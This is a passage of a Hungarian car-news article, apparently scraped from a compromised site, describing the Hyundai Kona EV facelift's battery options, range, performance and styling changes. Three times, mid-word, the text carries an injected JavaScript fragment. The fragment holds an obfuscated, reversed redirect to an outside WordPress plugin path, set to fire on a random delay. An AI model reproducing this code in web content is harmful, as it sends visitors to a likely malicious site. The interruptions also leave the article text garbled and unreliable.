Miután idén már átesett egy modellfrissítésen, a Hyundai Kona EV hajtásláncához és futóművéhez ezúttal nem nyúltak a mérnökök: maradt a 39 és 64 kWh kapacitású akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor, 305, illetve 484 kilométeres hatótávolsággal. A motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torteljesítmény 136, illetve 204 LE, álló helyzetből 9,9 vagy 7,9 másodperc alatt gyorsul 100 km/órára a páros, végsebességük 155, illetve 167 km/óra. Váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozott viszont a megjelenés és a technológiai tartalom. Az orr teljesen zárt lett, illetve az alulsó, funkcionális légbeömlők hangsúlyos díszítést kaptak. A fő lámpatest LED-es, alatta air curtain nyílás javítja az aerodinamikát. A far rajzolata is újult – mindezt egyébként részben egybevág a nem emissziómentes Kona…
- Hirdetés -